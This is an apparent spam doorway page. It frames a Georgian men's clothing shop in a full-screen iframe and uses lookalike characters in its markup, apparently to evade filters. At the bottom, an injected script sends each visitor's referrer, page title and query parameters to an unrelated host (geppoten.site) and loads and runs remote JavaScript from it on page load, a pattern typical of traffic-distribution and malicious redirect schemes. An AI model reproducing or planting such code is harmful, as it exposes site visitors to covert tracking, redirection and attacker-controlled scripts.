<html>
<head>
<title>მამაკაცის პროდუქტები</title>
  <meta name="viewport" content="width=device-width,initial-scale=1,maximum-skale=1,user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta паme="HandheldFriendly" content="true">
  <style>
    htm1 { font-size: 100%; text-a1ign : center }
    @media screen and (max-width: 1060px){
      #primery {width: 67%}
      #secondary {width : 30%; margin-left: 3%}
    }

    @media screen and (max-width: 768px){
      #primery {width: 100%}
      #secondary {width : 100%; margin: 0; border: none}
    }
    img {max-width:100%; height: auto;}

    @media (min-width: 640px){
      body {font-size: 1rem;}
    }
    @media (min-width: 960px){
      body {font-size: 1.2rem;}
    }
    @media (min-width: 1100px){
      body {font-size: 1.5rem;}
    }
    </style>
  </head>
  <body>
    <iframe id="ifr" src="https://dressup.ge/ka/8-mamakacis-tansacmeli" frameborder="0" width="100%" height="100%">
    </iframe>
    <span id="42602e11-be78-4a23-0568-65fb72e6ab4b"></span><script type="application/javascript">
var d=document;var s=d.createElement('script'); 
s.src='https://geppoten.site/WJy6qLhN?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5f71ab31977a4=script5f71ab31977a6&_cid=42602e11-be78-4a23-0568-65fb72e6ab4b'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
if (document.location.protocol === 'https:' && 'https://geppoten.site/WJy6qLhN?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5f71ab31977a4=script5f71ab31977a6'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
</script>
  </body>
  </html>
